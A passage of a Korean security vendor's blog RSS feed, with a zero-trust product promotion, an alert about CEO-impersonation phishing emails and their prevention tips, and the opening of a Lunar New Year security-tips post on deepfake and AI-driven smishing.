&lt;p data-ke-size=&quot;size16&quot;&gt;- VPN 접속 후 내부 자원에 대한 통제가 부족하다고 느끼는 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 원격 근무&amp;middot;재택근무 확대로 접근 제어 정책 재설계가 필요한 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공공기관 제로트러스트 가이드라인 대응이 필요한 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 기존 알약&amp;middot;알약 EDR 환경에서 제로트러스트로 확장하고 싶은 조직&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 보안 솔루션 통합으로 운영 비용을 절감하고 싶은 조직&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;경계가 사라진 시대, '모든 접근을 검증한다'는 원칙이 보안의 새로운 기준이 되고 있습니다. 기존 VPN과 경계형 보안 체계의 한계를 체감하고 계시다면, 지금이 바로 제로트러스트 보안 전환을 시작할 때입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티가 고객사의 환경에 최적화된 제로트러스트 보안 체계 구축을 도와드리겠습니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;알약 ZePP&lt;/b&gt;에 관해 더 자세한 정보가 필요하시면, 무료 보안 컨설팅 신청을 통해 제품 데모와 고객 사례를 직접 확인해보세요!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EzJ2u/dJMcagdmTmt/wB3JCCIJFp76erJTnAITh1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEzJ2u%2FdJMcagdmTmt%2FwB3JCCIJFp76erJTnAITh1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;70&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>거버넌스</category>
      <category>기업보안</category>
      <category>기업보안솔루션</category>
      <category>알약</category>
      <category>알약ZePP</category>
      <category>엔드포인트보안</category>
      <category>이스트시큐리티</category>
      <category>제로트러스트</category>
      <category>제로트러스트보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5725</guid>
      <comments>https://alyacofficialblog.tistory.com/5725#entry5725comment</comments>
      <pubDate>Thu, 12 Feb 2026 14:32:03 +0900</pubDate>
    </item>
    <item>
      <title>&amp;quot;지금 사무실인가요?&amp;quot;... 대표님 사칭 피싱 메일 주의!</title>
      <link>https://alyacofficialblog.tistory.com/5722</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;6844&quot; data-origin-height=&quot;3733&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/9SBz9/dJMcabb2k1b/OT34WQuXT19gfeN6EdOk30/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/9SBz9/dJMcabb2k1b/OT34WQuXT19gfeN6EdOk30/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/9SBz9/dJMcabb2k1b/OT34WQuXT19gfeN6EdOk30/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F9SBz9%2FdJMcabb2k1b%2FOT34WQuXT19gfeN6EdOk30%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;6844&quot; height=&quot;3733&quot; data-origin-width=&quot;6844&quot; data-origin-height=&quot;3733&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 주요 기업을 대상으로 대표이사나 임원을 사칭한 피싱 메일이 지속적으로 유포되고 있습니다&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 공격은 직접적인 악성 행위 대신&lt;span&gt;, &lt;/span&gt;메일 수신자의 반응을 유도하는 사회공학적 기법을 적극적으로 활용하고 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;1.&lt;/b&gt; &lt;b&gt;피싱 메일 유형&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현재 유포 중인 피싱 메일은 &lt;span&gt;&amp;ldquo;&lt;/span&gt;회신을 유도하는 유형&lt;span&gt;&amp;rdquo;&lt;/span&gt;과&amp;nbsp; &lt;span&gt;&amp;ldquo;QR&lt;/span&gt;코드 전송을 요구&lt;span&gt;&amp;rdquo;&lt;/span&gt;하는 두 가지 형태로 확인됩니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;유형&lt;span&gt;1. &lt;/span&gt;직접적인 회신 유도&lt;span&gt; - &lt;/span&gt;회사 대표를 사칭해 수신자가 긴급히 회신하도록 유도합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1012&quot; data-origin-height=&quot;339&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/B8pSC/dJMcacWjhxt/8rhJBo4KaC2o1l3WTX3tM0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/B8pSC/dJMcacWjhxt/8rhJBo4KaC2o1l3WTX3tM0/img.png&quot; data-alt=&quot;[그림 1] 피싱 메일 유형1&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/B8pSC/dJMcacWjhxt/8rhJBo4KaC2o1l3WTX3tM0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FB8pSC%2FdJMcacWjhxt%2F8rhJBo4KaC2o1l3WTX3tM0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1012&quot; height=&quot;339&quot; data-origin-width=&quot;1012&quot; data-origin-height=&quot;339&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] 피싱 메일 유형1&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;유형&lt;span&gt;2. &lt;/span&gt;메신저&lt;span&gt; QR &lt;/span&gt;코드 전송 요구&lt;span&gt; - &lt;/span&gt;원활한 업무 연락을 명목으로 메신저 채팅방&lt;span&gt; QR&lt;/span&gt;코드 생성을 요구합니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cNTiw4/dJMcaioI1yh/yKUP4iSJAzSDhx7H2qZgE0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cNTiw4/dJMcaioI1yh/yKUP4iSJAzSDhx7H2qZgE0/img.png&quot; data-origin-width=&quot;510&quot; data-origin-height=&quot;366&quot; data-is-animation=&quot;false&quot; data-widthpercent=&quot;42.72&quot; style=&quot;width: 42.2245%; margin-right: 10px;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cNTiw4/dJMcaioI1yh/yKUP4iSJAzSDhx7H2qZgE0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcNTiw4%2FdJMcaioI1yh%2FyKUP4iSJAzSDhx7H2qZgE0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;510&quot; height=&quot;366&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/r9OAF/dJMcaioI1yl/s8maCVFqB4jwe6uWSgoaH1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/r9OAF/dJMcaioI1yl/s8maCVFqB4jwe6uWSgoaH1/img.png&quot; data-origin-width=&quot;624&quot; data-origin-height=&quot;334&quot; data-is-animation=&quot;false&quot; style=&quot;width: 56.6127%;&quot; data-widthpercent=&quot;57.28&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/r9OAF/dJMcaioI1yl/s8maCVFqB4jwe6uWSgoaH1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fr9OAF%2FdJMcaioI1yl%2Fs8maCVFqB4jwe6uWSgoaH1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;624&quot; height=&quot;334&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;[그림 2] 피싱 메일 유형2&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span&gt;2. 피싱 메일 &lt;/span&gt;주요 특징&lt;/b&gt;&lt;/h4&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;권위 사칭&lt;/b&gt;&lt;/span&gt;: 대표이사, 회장 등 조직 내 상급자의 직위를 악용합니다.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;탐지 우회&lt;/b&gt;&lt;/span&gt;&lt;span&gt;: &lt;/span&gt;공격자는 기업 보안 장비의 필터링을 피하기 위해&lt;span&gt; Gmail &lt;/span&gt;및&lt;span&gt; Hotmail &lt;/span&gt;계정을 이용하여 메일을 발송합니다&lt;span&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;공용&amp;nbsp;메일&amp;nbsp;타겟팅&lt;/b&gt;:&lt;/span&gt;&amp;nbsp;기업&amp;nbsp;홈페이지&amp;nbsp;등에&amp;nbsp;공개된&amp;nbsp;대표&amp;nbsp;메일이나,&amp;nbsp;채용&amp;nbsp;메일&amp;nbsp;등을&amp;nbsp;주요&amp;nbsp;타겟으로&amp;nbsp;삼습니다.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;단계적&amp;nbsp;공격&lt;/b&gt;:&lt;/span&gt;&amp;nbsp;초기에&amp;nbsp;직접적인&amp;nbsp;악성&amp;nbsp;코드&amp;nbsp;배포&amp;nbsp;대신&amp;nbsp;사용자의&amp;nbsp;반응을&amp;nbsp;유도하여&amp;nbsp;경계심을&amp;nbsp;낮추고&amp;nbsp;이후&amp;nbsp;실제&amp;nbsp;공격을&amp;nbsp;위한&amp;nbsp;정찰단계일&amp;nbsp;가능성이&amp;nbsp;높습니다.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;3.&lt;/b&gt; &lt;b&gt;&lt;span&gt;대응 가이드라인 및 예방 수칙&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔&amp;nbsp; 발신자 주소 재확인&lt;/b&gt;:&amp;nbsp;발신자명이&amp;nbsp;아닌&amp;nbsp;발신자&amp;nbsp;메일주소가&amp;nbsp;회사&amp;nbsp;메일&amp;nbsp;계정이&amp;nbsp;맞는지&amp;nbsp;확인해야&amp;nbsp;합니다.&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔&amp;nbsp; 교차&amp;nbsp;확인&amp;nbsp;필수:&amp;nbsp;&lt;/b&gt;메신저 요구나 긴급한 요청을 받았을 경우, 전화 또는 사내 메신저 등 기존의 공식 채널을 통해 정상 메일 여부를 확인합니다.&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔&amp;nbsp; 외부&amp;nbsp;채널&amp;nbsp;접속&amp;nbsp;지양:&amp;nbsp;&lt;/b&gt;업무상&amp;nbsp;필요한&amp;nbsp;소통은&amp;nbsp;사내&amp;nbsp;공식&amp;nbsp;채널을&amp;nbsp;통해&amp;nbsp;진행하고,&amp;nbsp;검증되지&amp;nbsp;않은&amp;nbsp;외부&amp;nbsp;단톡방이나&amp;nbsp;QR&amp;nbsp;코드&amp;nbsp;공유는&amp;nbsp;지양해야&amp;nbsp;합니다.&lt;/p&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;✔&lt;/b&gt;&amp;nbsp; &lt;b&gt;사내 보안팀 신고&lt;/b&gt;: 의심스러운 메일을 수신했다면 답변하지 말고 즉시 사내 보안 담당 부서로 공유합니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 피싱 공격은 사람의 심리를 노려 이성적인 판단을 흐리게 하는 사회공학 기반의 공격으로 갈수록 교묘해지고 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;임원 및 경영진을 사칭한 긴급 요청 메일을 수신했을 경우 즉시 대응하기보다 반드시 공식 채널을 통해 사실 확인 절차를 거쳐 피해를 예방하시기 바랍니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EtZEt/dJMcahi3RHB/XBoIHTblxWCOzbHXSRRCXk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEtZEt%2FdJMcahi3RHB%2FXBoIHTblxWCOzbHXSRRCXk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5722</guid>
      <comments>https://alyacofficialblog.tistory.com/5722#entry5722comment</comments>
      <pubDate>Wed, 11 Feb 2026 14:49:32 +0900</pubDate>
    </item>
    <item>
      <title>안전한 설 연휴를 위한 6가지 보안수칙</title>
      <link>https://alyacofficialblog.tistory.com/5721</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;설 연휴는 가족과 함께 휴식을 즐기는 소중한 시간이지만, 사이버 공격자들에게는 보안 공백을 노릴 수 있는 기회이기도 합니다. 연휴 기간에는 담당자 부재로 인해 보안 사고 발생 시 즉각적인 대응이 어려운 경우가 많고, 특히 2026년에는 생성형 AI를 활용한 공격이 전방위로 확산되며 위협의 정교함이 한층 높아졌습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안전한 설 연휴를 보내기 위해, 꼭 점검해야 할 6가지 보안 수칙을 정리해 드립니다.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384105.png&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1080&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/sdesb/dJMcahpNWnq/mUvzODB1Azw7rwspBLJ3cK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/sdesb/dJMcahpNWnq/mUvzODB1Azw7rwspBLJ3cK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/sdesb/dJMcahpNWnq/mUvzODB1Azw7rwspBLJ3cK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fsdesb%2FdJMcahpNWnq%2FmUvzODB1Azw7rwspBLJ3cK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;700&quot; height=&quot;700&quot; data-filename=&quot;Group 2034384105.png&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1080&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;딥페이크&amp;middot;AI 피싱 주의&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt;1) AI가 만든 '진짜 같은 가짜'에 속지 마세요!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;최근 사이버 공격자들은 생성형 AI를 활용해 실제 인물의 목소리와 얼굴을 정교하게 모방하는 딥페이크 기반 사기를 적극 활용하고 있습니다. 가족이나 지인을 사칭한 영상 통화, 금융기관 직원을 가장한 AI 음성 전화(비싱) 등이 명절 연휴를 전후해 증가할 가능성이 큽니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;또한 자연스러운 한국어로 작성된 AI 피싱 메일은 기존의 어색한 번역투 메일과 달리 구분이 쉽지 않습니다. 포털 로그인, 택배 조회, 계정 보안 점검 등을 위장한 맞춤형 피싱 공격 역시 더욱 정교해지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;  이렇게 대비하세요!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 영상 통화나 음성 전화로 긴급 송금을 요청받을 경우, 반드시 다른 연락 수단으로 사실 여부를 확인하세요.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 이메일&amp;middot;문자에 포함된 링크 클릭 전, 발신자 주소와 URL을 꼼꼼히 확인하세요.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 주요 계정에는 반드시 다단계 인증(MFA)을 설정하세요.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #006dd7;&quot;&gt;&lt;b&gt;AI 강화 스미싱 주의&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;2) &amp;lsquo;결제 완료&amp;rsquo;&amp;middot;&amp;lsquo;배송 지연&amp;rsquo; 문자, 바로 반응하지 마세요!&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;명절 선물 배송이 집중되는 시기를 노려 쇼핑몰 결제, 택배 배송, 해외 직구를 위장한 스미싱이 급증합니다. 2026년에는 AI가 수신자의 이름이나 행동 패턴을 분석해 메시지를 자동 생성하는 &amp;lsquo;적응형 스미싱&amp;rsquo; 공격도 확산되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 문자에 링크 대신 고객센터 전화번호를 삽입해 전화를 유도하는 방식은 여전히 빈번하게 활용되고 있습니다. 전화를 걸 경우, AI 음성 응답 시스템을 통해 악성 앱 설치나 개인정보 입력을 유도하는 사례가 보고되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
